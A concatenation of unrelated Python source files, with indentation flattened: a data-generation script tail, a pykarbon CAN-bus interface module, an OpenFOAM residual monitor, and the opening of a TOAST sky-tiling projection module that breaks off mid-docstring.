constants.data_dict['pddl_params'] = {'object_target': -1, 'object_sliced': -1,
'parent_target': -1, 'toggle_target': -1,
'mrecep_target': -1}
constants.data_dict['dataset_params'] = {'video_frame_rate': -1}
constants.data_dict['pddl_state'] = []
def dump_data_dict():
data_save_path = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
with open(os.path.join(data_save_path, DATA_JSON_FILENAME), 'w') as fp:
json.dump(constants.data_dict, fp, sort_keys=True, indent=4)
def delete_save(in_parallel):
save_folder = constants.save_path.replace(RAW_IMAGES_FOLDER, '')
if os.path.exists(save_folder):
try:
shutil.rmtree(save_folder)
except OSError as e:
if in_parallel: # another thread succeeded at this task while this one failed.
return False
else:
raise e # if we're not running in parallel, this is an actual.
return True
def parallel_generate(args):
procs = [mp.Process(target=generate, args=(args,)) for _ in range(args.num_threads)]
try:
for proc in procs:
proc.start()
time.sleep(0.1)
finally:
for proc in procs:
proc.join()
@args_ingredient.config
def cfg_args():
# don't save any data (for debugging purposes)
force_unsave = False
# debug mode
debug = False
# where to save the generated data
name = None
# X server number
x_display = '0'
# just examine what data is gathered; don't gather more
just_examine = False
# number of processes (>1 means to run in parallel)
num_threads = 1
# path to json file with trajectory dump
json_file = ''
# params
repeats_per_cond = 3
trials_before_fail = 5
async_load_every_n_samples = 10
@ex.automain
def main(args):
args = helper_util.AttrDict(**args)
args.save_path = os.path.join(constants.ET_DATA, args.name)
if args.num_threads > 1:
parallel_generate(args)
else:
generate(args)
|
can.py | # -*- coding: utf-8 -*-
''' Tool for running a session with the can interface.
Example:
.. code-block:: python
import pykarbon.can as pkc
from time import sleep
with pkc.Session() as dev:
dev.write(0x123, 0x11223344) # Send a message
sleep(5) # Your code here!
dev.storedata('can_messages') # Save messages that we receive while we waited
Lets us autodetect the can bus baudrate, write data to the can bus, wait for some messages to
be receive, and finally save those messages to can_messages.csv
'''
from time import sleep, time
import threading
import re
import pykarbon.hardware as pk
# Tools --------------------------------------------------------------------------------------------
def stringify(value):
''' Takes variously formatted hex values and outputs them in simple string format '''
out = ''
if value:
out = (hex(value) if isinstance(value, int) else value).replace('0x', '').upper()
return out
def hexify(value):
''' Takes variously formatted hex values and outputs them as a int '''
out = 0x0
if value:
out = int(value.replace('0x', ''), 16) if isinstance(value, str) else value
return out
# --------------------------------------------------------------------------------------------------
class Session():
'''Attaches to CAN serial port and allows reading/writing from the port.
Automatically performs port discovery on linux and windows. Then is able to take
ownership of a port and perform read/write operations. Also offers an intelligent
method of sending can messages that will automatically determine frame format, type,
and data length based only on the message id and data.
There is additional support for registering a function to certain can data ids. When the
interface receives a registered message, it will call the function and send the returned
data. This features requires running the session with automonitoring enabled.
By default, the session will also try to automatically discover the bus baudrate.
Arguments:
baudrate (int/str, optional):
`None` -> Disable setting baudrate altogther (use mcu stored value)
`'autobaud'` -> Attempt to automatically detect baudrate
`100 - 1000` -> Set the baudrate to the input value, in thousands
timeout (float, optional): Time until read/write attempts stop in seconds. (None disables)
automon (bool, optional): Automatically monitor incoming data in the background.
reaction_poll_delay (float, optional): Time between checking received data for a registered
value. Decreasing this delay will consume more unused CPU time.
If the baudrate option is left blank, the device will instead attempt to automatically
detect the baudrate of the can-bus. When 'automon' is set to 'True', this object will
immediately attempt to claim the CAN connection that it discovers. Assuming the connection
can be claimed, the session will then start monitoring all incoming data in the background.
This data is stored in the the session's 'data' attribute, and can be popped from the queue
using the 'popdata' method. Additionally, the entire queue may be purged to a csv file using
the 'storedata' method -- it is good practice to occasionally purge the queue.
Attributes:
interface: :class:`pykarbon.hardware.Interface`
pre_data: Data before it has been parsed by the registry service.
data: Queue for holding the data read from the port
isopen: Bool to indicate if the interface is connected
baudrate: Reports the discovered or set baudrate
registry: Dict of registered DIO states and function responses
bgmon: Thread object of the bus background monintor
'''
def __init__(self, baudrate='autobaud', timeout=.01, automon=True, reaction_poll_delay=.01):
'''Discovers hardware port name.'''
self.interface = pk.Interface('can', timeout)
self.poll_delay = reaction_poll_delay
self.baudrate = None
self.pre_data = []
self.data = []
self.isopen = False
self.bgmon = None
self.registry = {}
if baudrate == 'autobaud':
self.autobaud(None)
elif isinstance(baudrate, int):
self.autobaud(baudrate)
if automon:
self.open()
self.bgmonitor()
else:
self.data = self.pre_data
def __enter__(self):
if not self.isopen:
self.interface.__enter__()
self.isopen = True
return self
def open(self):
'''Claim the interface (only one application may open the serial port)'''
if not self.isopen:
self.interface.claim()
self.isopen = True
return self.isopen
def pushdata(self, line: str):
'''Add data to the end of the session queue.
NOTE: Strips EoL characters.
Args:
line: Data that will be pushed onto the queue
'''
self.data.append(line.strip('\n\r'))
def autobaud(self, baudrate: int) -> str:
'''Autodetect the bus baudrate
If the passed argument 'baudrate' is None, the baudrate will be autodetected,
otherwise, the bus baudrate will be set to the passed value.
When attempting to auto-detect baudrate, the system will time-out after 3.5 seconds.
Args:
baudrate: The baudrate of the bus in thousands. Set to 'None' to autodetect
Returns:
The discovered or set baudrate
'''
set_rate = None
with pk.Interface('terminal', timeout=.001) as term:
if not baudrate:
term.cwrite('can-autobaud')
start = time()
elapsed = 0
set_rate = term.cread()[0].strip('\n\r')
while not set_rate and elapsed < 3.5:
set_rate = term.cread()[0].strip('\n\r')
elapsed = time() - start
else:
term.cwrite('set can-baudrate ' + str(baudrate))
set_rate = str(baudrate)
temp = re.search(r'\s(?P<baud>[\d]+)k', set_rate)
self.baudrate = temp.groupdict()['baud'] if temp else None
return self.baudrate
@staticmethod
def format_message(id, data, **kwargs):
''' Takes an id and data and determines other message characteristics
When keyword arguments are left blank, this function will extrapolate the correct
frame information based on the characteristics of the passed id and data.
If desired, all of the automatically determined characteristics may be overwritten.
Args:
data_id: Data id of the message, in hex (0x123, '0x123', '123')
data: Message data, in hex -- if 'None', the device will send a remote frame.
NOTE: Use string version of hex to send leading zeroes ('0x00C2' or '00C2')
**kwargs:
*format*: Use standard or extended frame data id ('std' or 'ext')
*length*: Length of data to be transmitted, in bytes (11223344 -> 4)
*type*: Type of frame ('remote' or 'data')
'''
data = stringify(data)
message = {
'format': kwargs.get('format', 'std' if hexify(id) <= 0x7FF else 'ext'),
'id': stringify(id),
'length': kwargs.get('length', int(len(data) / 2)),
'data': data,
'type': kwargs.get('type', 'data' if data else 'remote')
}
return message
def send_can(self, message) -> str:
'''Transmits the passed message on the canbus
Args:
message: A dictionary containing the data required to build a can message
Returns:
The string version of the transmitted message
'''
str_message = '{format} {id} {length} {data} {type}'.format(**message)
self.interface.cwrite(str_message)
# Encourage io to actually send packets
sleep(.0001)
return str_message
def register(self, data_id, action, **kwargs):
'''Automatically perform action upon receiving data_id
Register an action that should be automatically performed when a certain data
id is read. By default the action will be performed when the id is attached
to any frame type, and the action's returned data will be checked -- if the data
can be formatted as a can message, it will automatically be transmitted as a reply.
Actions should be a python function, which will be automatically wrapped in a
pykarbon.can.Reactions object by this function. When the passed action is called
Reactions will try to pass it the hex id and data as the first and second positional
arguments. If thrown a TypeError, it will call the action without any arguments.
Example:
>>> Session.register(0x123, action)
Note:
If the frame is a remote request frame, the passed data will be 'remote' instead
of an int!
Args:
data_id: The hex data_id that the action will be registered to
action: The python function that will be performed.
kwargs:
remote_only: Respond only to remote request frames (Default: False)
run_in_background: Run action as background task (Default: True)
auto_response: Automatically reply with returned message (Default: True)
Returns:
The 'Reaction' object that will be used in responses to this data_id
'''
reaction = Reactions(self.write, data_id, action, **kwargs)
self.registry[data_id] = reaction
return reaction
def write(self, can_id, data):
'''Auto-format and transmit message
For the large majority of use cases, this is the simplest and best method to send a packet
of data over the canbus. Only message id and the data need to specified as hex values. All
other information about the packet will be extrapolated.
Args:
can_id: The hex id of the data
data: The hex formatted data
'''
message = self.format_message(can_id, data)
self.send_can(message)
def readline(self):
'''Reads a single line from the port, and stores the output in self.data
If no data is read from the port, then nothing is added to the data queue.
Returns
The data read from the port
'''
line = ""
if self.isopen:
line = self.interface.cread()[0]
if line:
self.pre_data.append(line)
return line
def bgmonitor(self):
'''Start monitoring the canbus in the background
Uses python threading module to start the monitoring process.
Returns:
The 'thread' object of this background process
'''
if not self.data:
self.data = []
self.bgmon = threading.Thread(target=self.monitor)
self.bgmon.start()
threading.Thread(target=self.registry_service).start()
return self.bgmon
def monitor(self):
'''Watches port for can data while connection is open.
The loop is predicated on the connection being open; closing the connection will stop the
monitoring session.
Args:
session: A canbus session object
Returns:
The method used to stop monitoring. (str)
'''
retvl = "SessionClosed"
while self.isopen:
try:
self.readline()
except KeyboardInterrupt:
retvl = "UserCancelled"
return retvl
def registry_service(self):
'''Check if receive line has a registered action.
If the receive line does have an action, perform it, and then move the data
into the main data queue. Otherwise, just move the data.
'''
while self.isopen:
# Allow CPU to have time
sleep(self.poll_delay)
try:
line = self.pre_data.pop(0)
if line:
self.check_action(line)
self.pushdata(line)
except IndexError:
continue
return 0
def check_action(self, line):
'''Check is message has an action attached, and execute if found
Args:
line: Can message formatted as [id] [data]
'''
try:
data_id, message = line.strip('\n\r').split(' ')
except ValueError:
return
data_id = int(data_id, 16)
if data_id in self.registry:
reaction = self.registry[data_id]
if reaction.remote_only and ("remote" not in message):
return
if reaction.run_in_background:
reaction.bgstart(message)
else:
reaction.start(message)
return
def storedata(self, filename: str, mode='a+'):
'''Pops the entire queue and saves it to a csv.
This method clears the entire queue: once you have called it, all previously received
data will no longer be stored in the sessions 'data' attribute. Instead, this data will
now reside in the specified .csv file.
Each received can message has its own line of the format: id,data.
By default, if a file that already exists is specified, the data will append to the end of
this file. This behavior can be changed by setting 'mode' to any standard 'file.write' mode.
Args:
filename: Name of file that will be created.
mode(str, optional): The file write mode to be used.
'''
if '.csv' not in filename:
filename = filename + '.csv'
with open(filename, mode) as datafile:
while True:
line = self.popdata()
if not line:
break
line = line.strip('\n\r')
line = line.replace(' ', ',')
datafile.write(line + "\n")
def popdata(self):
'''If there is data in the queue, pop an entry and return it.
Uses queue behavior, so data is returned with 'first in first out' logic
Returns:
String of the data read from the port. Returns empty string if the queue is empty
'''
try:
out = self.data.pop(0)
except IndexError:
out = ""
return out
def close(self):
'''Release the interface so that other session may interact with it
Any existing background monitor session will also be closed. If this session re-opens the
connection, background monitoring will need to be manually restarted with the 'bgmonitor'
method.
'''
self.isopen = False
try:
if self.bgmon.isAlive():
sleep(.1)
except AttributeError:
sleep(.001)
self.interface.release()
def __exit__(self, etype, evalue, etraceback):
self.isopen = False
try:
if self.bgmon.isAlive():
sleep(.1)
except AttributeError:
sleep(.001)
self.interface.__exit__(etype, evalue, etraceback)
def __del__(self):
if self.isopen:
self.close()
class Reactions():
'''A class for performing automated responses to certain can messages.
If the action returns a dict of hex id and data, then the reaction will
automatically respond with this id and data. If the dict has 'None' for
id, then the reaction will respond with the originating frame's id and
then returned data.
Note:
Example action response: {'id': 0x123, 'data': 0x11223344}
Attributes:
data_id: The can data id registered with this reaction
action: Function called by this reaction
remote_only: If the reaction will respond to non-remote request frames
run_in_background: If reaction will run as background thread
auto_response: If reaction will automatically reply
canwrite: Helper to write out can messages
'''
def __init__(self, canwrite, data_id, action, **kwargs):
'''Init attributes
Additonally sets all kwargs to default values if they are not
explicitly specified.
'''
self.canwrite = canwrite
self.data_id = data_id
self.action = action
if 'remote_only' in kwargs:
self.remote_only = kwargs['remote_only']
else:
self.remote_only = False
if 'run_in_background' in kwargs:
self.run_in_background = kwargs['run_in_background']
else:
self.run_in_background = True
if 'auto_response' in kwargs:
self.auto_response = kwargs['auto_response']
else:
self.auto_response = True
def start(self, hex_data):
'''Run the action in a blocking manner
Args:
hex_data: The hex data of the message that invoked this reaction.
Should be the string 'remote' for remote frames.
'''
if not self.remote_only and ('remote' not in hex_data):
hex_data = int(hex_data, 16) if hex_data else None
try:
out = self.action(self.data_id, hex_data)
except TypeError:
out = self.action()
return self.respond(out)
def bgstart(self, hex_data):
'''Call start as a background thread
Returns:
The thread of the background action
'''
bgaction = threading.Thread(target=self.start, args=[hex_data])
bgaction.start()
return bgaction
def respond(self, returned_data):
'''Automatically respond to frames, if requested
Args:
returned_data: A dict of id and data. If None, no response will be sent
'''
if (not returned_data) or (not self.auto_response):
return
try:
if not returned_data['id']:
self.canwrite(self.data_id, returned_data['data'])
else:
self.canwrite(returned_data['id'], returned_data['data'])
except (TypeError, KeyError) as bad_return:
print("Bad action response: ", bad_return)
return
return
def hardware_reference(device='K300'):
'''Print useful hardware information about the device
Displays hardware information about the CAN device, such as pinouts.
Then pinouts assume that the user is facing the front of the device, and that the fins
are pointed up.
Args:
device (str, optional): The karbon series being used. Defaults to the K300
'''
ref_k300 = \
'''
Info: Compliant with CAN 2.0B. The canbus is not internally terminated; the device
should be used with properly terminated CAN cables/bus. The termination resistors
are required to match the nominal impedance of the cable. To meet ISO 11898, this
resistance should be 120 Ohms.
Pinout:
---------------------
|| 3 | 2 | 1 ||
|| ^ ^ ^ ||
|| |_| |_| |_| ||
|| GND | LOW | HGH ||
---------------------
'''
ref_dict = {
'K300': ref_k300,
'K700': ref_k300
}
try:
print(ref_dict[device.upper()])
except KeyError:
print("Please select from: [K300, K700]")
|
monitor.py |
import sys
sys.path.append(r"/home/anoldfriend/OpenFOAM/anoldfriend-7/utilities/")
import signal
import multiprocessing as mp
import time
from residual_monitor import read_residuals,plot_multiple_residuals,quit
log="run.log"
pressure_name="p_rgh"
nCorrectors=1
interval=5
sample_size=300
# m_residuals=[["h"],["Ux","Uy",pressure_name]]
# m_residuals=[["h"],["Ux",pressure_name]]
m_residuals=[["h","CO2","O2"]]
m_thresholds=[[1e-1,1e-4,1e-5,1e-6,1e-7]]
m_save_files=["residuals1.jpg"]
def process_fun():
line_offset=0
iterations_offset=0
while True:
df,line_offset,iterations,info=read_residuals(log,line_offset,pressure_name,nCorrectors,sample_size)
if "cum_physical_time" in info.keys():
physical_time=info["cum_physical_time"]
else:
physical_time="not found"
if "cum_execution_time" in info.keys():
execution_time=info["cum_execution_time"]
else:
execution_time="not found"
title=f"physical time : {physical_time} s, execution time : {execution_time} s"
titles=[title]*len(m_residuals)
if "latest_delta_time" in info.keys():
delta_time=info["latest_delta_time"]
else:
delta_time= "not found"
if "maxCo" in info.keys():
maxCo=info["maxCo"]
else:
maxCo="not found"
if "meanCo" in info.keys():
meanCo=info["meanCo"]
else:
meanCo="not found"
text=f"latest_delta_time: {delta_time} s \n" + \
f"mean CFL num: {meanCo}\n" + \
f"max CFL num: {maxCo}"
texts=[text]*len(m_residuals)
plot_multiple_residuals(df,iterations_offset,m_residuals,m_thresholds,titles,texts,m_save_files)
iterations_offset+=iterations
time.sleep(interval)
if __name__=="__main__":
try:
signal.signal(signal.SIGINT,quit)
signal.signal(signal.SIGTERM,quit)
p=mp.Process(target=process_fun)
p.start()
p.deamon=True
while True:
pass
except Exception as err:
print(f"Error Message: {err}")
|
toast.py | # -*- mode: python; coding: utf-8 -*-
# Copyright 2013-2021 Chris Beaumont and the AAS WorldWide Telescope project
# Licensed under the MIT License.
"""Computations for the TOAST projection scheme and tile pyramid format.
For all TOAST maps, the north pole is in the dead center of the virtual image
square, the south pole is at all four of its corners, and the equator is a
diamond connecting the midpoints of the four sides of the square. (See Figure 3
of McGlynn+ 2019, DOI:10.3847/1538-4365/aaf79e).
For TOAST maps of the sky, the line of RA (lon) = 0 in the northern hemisphere
extends from the center of the square to the right, as in the Figure 3 mentioned
above. The RA = 90 line goes from the center up, and so on counter-clockwise
around the square.
For TOAST planetary maps, the lon = 0 line in the northern hemisphere extends
from the center of the square to the *left*. The lon = 90 line extends
downwards, and increasing longitude results in counter-clockwise motion around
the square as for sky maps. In other words, the longitudinal orientation is
rotated by 180 degrees.
"""
from __future__ import absolute_import, division, print_function
__all__ = '''
count_tiles_matching_filter
create_single_tile
generate_tiles
generate_tiles_filtered
sample_layer
sample_layer_filtered
Tile
ToastCoordinateSystem
toast_pixel_for_point
toast_tile_area
toast_tile_for_point
toast_tile_get_coords
'''.split()
from collections import namedtuple
from enum import Enum
import numpy as np
from tqdm import tqdm
from ._libtoasty import subsample, mid
from .image import Image
from .pyramid import Pos, tiles_at_depth
HALFPI = 0.5 * np.pi
THREEHALFPI = 1.5 * np.pi
TWOPI = 2 * np.pi
def _arclength(lat1, lon1, lat2, lon2):
"""Compute the length of an arc along the great circle defined by spherical
latitude and longitude coordinates. Inputs and return value are all in
radians.
"""
c = np.sin(lat1) * np.sin(lat2) + np.cos(lon1 - lon2) * np.cos(lat1) * np.cos(lat2)
return np.arccos(c)
def _spherical_triangle_area(lat1, lon1, lat2, lon2, lat3, lon3):
"""Compute the area of the specified spherical triangle in steradians. Inputs
are in radians. From https://math.stackexchange.com/a/66731 . My initial
implementation used unit vectors on the sphere instead of latitudes and
longitudes; there might be a faster way to do things in lat/lon land.
"""
c = _arclength(lat1, lon1, lat2, lon2)
a = _arclength(lat2, lon2, lat3, lon3)
b = _arclength(lat3, lon3, lat1, lon1)
s = 0.5 * (a + b + c)
tane4 = np.sqrt(np.tan(0.5 * s) * np.tan(0.5 * (s - a)) * np.tan(0.5 * (s - b)) * np.tan(0.5 * (s - c)))
e = 4 * np.arctan(tane4)
return e
class ToastCoordinateSystem(Enum):
"""
Different TOAST coordinate systems that are in use.
"""
ASTRONOMICAL = 'astronomical'
"""The default TOAST coordinate system, where the ``lat = lon = 0`` point
lies at the middle right edge of the TOAST projection square."""
PLANETARY = 'planetary'
"""The planetary TOAST coordinate system. This is rotated 180 degrees in
longitude from the astronomical system, such that the ``lat = lon = 0``
point lies at the middle left edge of the TOAST projection square."""
Tile = namedtuple('Tile', 'pos corners increasing')
_level1_astronomical_lonlats = np.radians([
[(0, -90), (90, 0), (0, 90), (180, 0)],
[(90, 0), (0, -90), (0, 0), (0, 90)],
[(180, 0), (0, 90), (270, 0), (0, -90)],
[(0, 90), (0, 0), (0, -90), (270, 0)],
])
_level1_astronomical_lonlats.flags.writeable = False
def _create_level1_tiles(coordsys):
lonlats = _level1_astronomical_lonlats
if coordsys == ToastCoordinateSystem.PLANETARY:
lonlats = lonlats.copy()
lonlats[...,0] = (lonlats[...,0] + np.pi) % TWOPI
return [
Tile(Pos(n=1, x=0, y=0), lonlats[0], True),
Tile(Pos(n=1, x=1, y=0), lonlats[1], False),
Tile(Pos(n=1, x=0, y=1), lonlats[2], False),
Tile(Pos(n=1, x=1, y=1), lonlats[3], True),
]
def toast_tile_area(tile):
"""Calculate the area of a TOAST tile in steradians.
Parameters
----------
tile : :class:`Tile`
A TOAST tile.
Returns
-------
The area of the tile in steradians.
Notes
-----
This computation is not very fast.
"""
ul, ur, lr, ll = tile.corners
if tile.increasing:
a1 = _spherical_triangle_area(ul[1], ul[0], ur[1], ur[0], ll[1], ll[0])
a2 = _spherical_triangle_area(ur[1], ur[0], lr[1], lr[0], ll[1], ll[0])
else:
a1 = _spherical_triangle_area(ul[1], ul[0], ur[1], ur[0], lr[1], lr[0])
a2 = _spherical_triangle_area(ul[1], ul[0], ll[1], ll[0], lr[1], lr[0])
return a1 + a2
def _equ_to_xyz(lat, lon):
"""
Convert equatorial to cartesian coordinates. Lat and lon are in radians.
Output is on the unit sphere.
"""
clat = np.cos(lat)
return np.array([
np.cos(lon) * clat,
np.sin(lat),
np.sin(lon) * clat,
])
def _left_of_half_space_score(point_a, point_b, test_point):
"""
A variant of WWT Window's IsLeftOfHalfSpace.
When determining which tile a given RA/Dec lives in, it is inevitable that
rounding errors can make seem that certain coordinates are not contained by
*any* tile. Unlike IsLeftOfHalf space, which returns a boolean based on the
dot product calculated here, we return a number <= 0, where 0 indicates that
the test point is *definitely* in the left half-space defined by the A and B
points. Negative values tell us how far into the right space the point is;
when rounding errors are biting us, that value might be something like
-1e-16.
"""
return min(np.dot(np.cross(point_a, point_b), test_point), 0)
def _toast_tile_containment_score(tile, lat, lon):
"""
Assess whether a TOAST tile contains a given point.
Parameters
----------
tile : :class:`Tile`
A TOAST tile
lat : number
The latitude (declination) of the point, in radians.
lon : number
The longitude (RA) of the point, in radians. This value must
have already been normalied to lie within the range [0, 2pi]
(inclusive on both ends.)
Returns
-------
A floating-point "containment score" number. If this number is zero, the
point definitely lies within the tile. Otherwise, the number will be
negative, with more negative values indicating a greater distance from the
point to the nearest tile boundary. Due to inevitable roundoff errors, there
are situations where, given a certain point and tile, the point "should" be
contained in the tile, but due to roundoff errors, its score will not be
exactly zero.
"""
# Derived from ToastTile.IsPointInTile.
if tile.pos.n == 0:
return 0
# Note that our labeling scheme is different than that used in WWT proper.
if tile.pos.n == 1:
if lon >= 0 and lon <= HALFPI and tile.pos.x == 1 and tile.pos.y == 0:
return 0
if lon > HALFPI and lon <= np.pi and tile.pos.x == 0 and tile.pos.y == 0:
return 0
if lon > np.pi and lon < THREEHALFPI and tile.pos.x == 0 and tile.pos.y == 1:
return 0
if lon >= THREEHALFPI and lon <= TWOPI and tile.pos.x == 1 and tile.pos.y == 1:
return 0
return -100
test_point = _equ_to_xyz(lat, lon)
ul = _equ_to_xyz(tile.corners[0][1], tile.corners[0][0])
ur = _equ_to_xyz(tile.corners[1][1], tile.corners[1][0])
lr = _equ_to_xyz(tile.corners[2][1], tile.corners[2][0])
ll = _equ_to_xyz(tile.corners[3][1], tile.corners[3][0])
upper = _left_of_half_space_score(ul, ur, test_point)
right = _left_of_half_space_score(ur, lr, test_point)
lower = _left_of_half_space_score(lr, ll, test_point)
left = _left_of_half_space_score(ll, ul, test_point)
return upper + right + lower + left
def toast_tile_for_point(depth, lat, lon, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
"""
Identify the TOAST tile at a given depth that contains the given point.
Parameters
----------
depth : non-negative integer
The TOAST tile pyramid depth to drill down to. For any given depth,
there exists a tile containing the input point. As the depth gets
larger, the precision of the location gets more precise.
lat : number
The latitude (declination) of the point, in radians.
lon : number
The longitude (RA) of the point, in radians. This value must
have already been normalized to lie within the range [0, 2pi]
(inclusive on both ends.)
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
Returns
-------
The :class:`Tile` at the given depth that best contains the specified
point.
"""
lon = lon % TWOPI
if depth == 0:
return Tile(Pos(n=0, x=0, y=0), (None, None, None, None), False)
for tile in _create_level1_tiles(coordsys):
if _toast_tile_containment_score(tile, lat, lon) == 0.:
break
while tile.pos.n < depth:
# Due to inevitable roundoff errors in the tile construction process, it
# can arise that we find that the point is contained in a certain tile
# but not contained in any of its children. We deal with this reality by
# using the "containment score" rather than a binary in/out
# classification. If no sub-tile has a containment score of zero, we
# choose whichever tile has the least negative score. In typical
# roundoff situations that score will be something like -1e-16.
best_score = -np.inf
for child in _div4(tile):
score = _toast_tile_containment_score(child, lat, lon)
if score == 0.:
tile = child
break
if score > best_score:
tile = child
best_score = score
return tile
def toast_tile_get_coords(tile):
"""
Get the coordinates of the pixel centers of a TOAST Tile.
Parameters
----------
tile : :class:`Tile`
A TOAST tile
Returns
-------
A tuple ``(lons, lats)``, each of which is a 256x256 array of longitudes and
latitudes of the tile pixel centers, in radians.
"""
return subsample(
tile.corners[0],
tile.corners[1],
tile.corners[2],
tile.corners[3],
256,
tile.increasing,
)
def toast_pixel_for_point(depth, lat, lon, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
"""
Identify the pixel within a TOAST tile at a given depth that contains the
given point.
Parameters
----------
depth : non-negative integer
The TOAST tile pyramid depth to drill down to. For any given depth,
there exists a tile containing the input point. As the depth gets
larger, the precision of the location gets more precise.
lat : number
The latitude (declination) of the point, in radians.
lon : number
The longitude (RA) of the point, in radians. This value must
have already been normalized to lie within the range [0, 2pi]
(inclusive on both ends.)
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
Returns
-------
A tuple ``(tile, x, y)``. The *tile* is the :class:`Tile` at the given depth
that best contains the specified point. The *x* and *y* values are
floating-point numbers giving the pixel location within the 256×256 tile.
The returned values are derived from a quadratic fit to the TOAST
coordinates of the pixels nearest the specified coordinates *lat* and *lon*.
"""
tile = toast_tile_for_point(depth, lat, lon, coordsys=coordsys)
# Now that we have the tile, get its pixel locations and identify the pixel
# that is closest to the input position.
lons, lats = toast_tile_get_coords(tile)
dist2 = (lons - lon)**2 + (lats - lat)**2
min_y, min_x = np.unravel_index(np.argmin(dist2), (256, 256))
# Now, identify a postage stamp around that best-fit pixel and fit a biquadratic
# mapping lat/lon to y/x.
halfsize = 4
x0 = max(min_x - halfsize, 0)
y0 = max(min_y - halfsize, 0)
x1 = min(min_x + halfsize + 1, 256)
y1 = min(min_y + halfsize + 1, 256)
dist2_stamp = dist2[y0:y1,x0:x1]
lons_stamp = lons[y0:y1,x0:x1]
lats_stamp = lats[y0:y1,x0:x1]
flat_lons = lons_stamp.flatten()
flat_lats = lats_stamp.flatten()
A = np.array([
flat_lons * 0 + 1,
flat_lons,
flat_lats,
flat_lons**2,
flat_lons * flat_lats,
flat_lats**2,
]).T
ygrid, xgrid = np.indices(dist2_stamp.shape)
x_coeff, _r, _rank, _s = np.linalg.lstsq(A, xgrid.flatten(), rcond=None)
y_coeff, _r, _rank, _s = np.linalg.lstsq(A, ygrid.flatten(), rcond=None)
# Evaluate the polynomial to get the refined pixel coordinates.
pt = np.array([
1,
lon,
lat,
lon**2,
lon * lat,
lat**2,
])
x = np.dot(x_coeff, pt)
y = np.dot(y_coeff, pt)
return tile, x0 + x, y0 + y
def _postfix_corner(tile, depth, filter, bottom_only):
"""
Yield subtiles of a given tile, in postfix (deepest-first) order.
Parameters
----------
tile : Tile
Parameters of the current tile.
depth : int
The depth to descend to.
filter : function(Tile)->bool
A filter function; only tiles for which the function returns True will
be investigated.
bottom_only : bool
If True, only yield tiles at max_depth.
"""
n = tile[0].n
if n > depth:
return
if n > 1 and not filter(tile):
return
for child in _div4(tile):
for item in _postfix_corner(child, depth, filter, bottom_only):
yield item
if n == depth or not bottom_only:
yield tile
def _div4(tile):
"""Return the four child tiles of an input tile."""
n, x, y = tile.pos.n, tile.pos.x, tile.pos.y
ul, ur, lr, ll = tile.corners
increasing = tile.increasing
to = mid(ul, ur)
ri = mid(ur, lr)
bo = mid(lr, ll)
le = mid(ll, ul)
ce = mid(ll, ur) if increasing else mid(ul, lr)
n += 1
x *= 2
y *= 2
return [
Tile(Pos(n=n, x=x, y=y ), (ul, to, ce, le), increasing),
Tile(Pos(n=n, x=x + 1, y=y ), (to, ur, ri, ce), increasing),
Tile(Pos(n=n, x=x, y=y + 1), (le, ce, bo, ll), increasing),
Tile(Pos(n=n, x=x + 1, y=y + 1), (ce, ri, lr, bo), increasing),
]
def create_single_tile(pos, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
"""
Create a single TOAST tile.
Parameters
----------
pos : :class:`~toasty.pyramid.Pos`
The position of the tile that will be created. The depth of the
tile must be at least 1.
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
Returns
-------
:class:`Tile`
Notes
-----
This function should only be used for one-off investigations and debugging.
It is much more efficient to use :func:`generate_tiles` for bulk computations.
"""
if pos.n == 0:
raise ValueError('cannot create a Tile for the n=0 tile')
children = _create_level1_tiles(coordsys)
cur_n = 0
while True:
cur_n += 1
ix = (pos.x >> (pos.n - cur_n)) & 0x1
iy = (pos.y >> (pos.n - cur_n)) & 0x1
tile = children[iy * 2 + ix]
if cur_n == pos.n:
return tile
children = _div4(tile)
def generate_tiles(depth, bottom_only=True, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
"""Generate a pyramid of TOAST tiles in deepest-first order.
Parameters
----------
depth : int
The tile depth to recurse to.
bottom_only : bool
If True, then only the lowest tiles will be yielded.
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
Yields
------
tile : Tile
An individual tile to process. Tiles are yielded deepest-first.
The ``n = 0`` depth is not included.
"""
return generate_tiles_filtered(depth, lambda t: True, bottom_only, coordsys=coordsys)
def generate_tiles_filtered(depth, filter, bottom_only=True, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
"""Generate a pyramid of TOAST tiles in deepest-first order, filtering out subtrees.
Parameters
----------
depth : int
The tile depth to recurse to.
filter : function(Tile)->bool
A filter function; only tiles for which the function returns True will
be investigated.
bottom_only : optional bool
If True, then only the lowest tiles will be yielded.
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
Yields
------
tile : Tile
An individual tile to process. Tiles are yielded deepest-first.
The ``n = 0`` depth is not included.
"""
for t in _create_level1_tiles(coordsys):
for item in _postfix_corner(t, depth, filter, bottom_only):
yield item
def count_tiles_matching_filter(depth, filter, bottom_only=True, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
"""
Count the number of tiles matching a filter.
Parameters
----------
depth : int
The tile depth to recurse to.
filter : function(Tile)->bool
A filter function; only tiles for which the function returns True will
be investigated.
bottom_only : bool
If True, then only the lowest tiles will be processed.
coordsys : optional :class:`ToastCoordinateSystem`
The TOAST coordinate system to use. Default is
:attr:`ToastCoordinateSystem.ASTRONOMICAL`.
Returns
------
The number of tiles matching the filter. Even if ``bottom_only`` is false,
the ``n = 0`` tile is not counted.
Notes
-----
This function's call signature and tree-exploration semantics match
:func:`generate_tiles_filtered`.
"""
# With a generic filter function, brute force is our only option:
n = 0
for _tile in generate_tiles_filtered(depth, filter, bottom_only=bottom_only, coordsys=coordsys):
n += 1
return n
def sample_layer(
pio,
sampler,
depth,
coordsys=ToastCoordinateSystem.ASTRONOMICAL,
format=None,
parallel=None,
cli_progress=False,
):
"""Generate a layer of the TOAST tile pyramid through direct sampling.
Parameters
----------
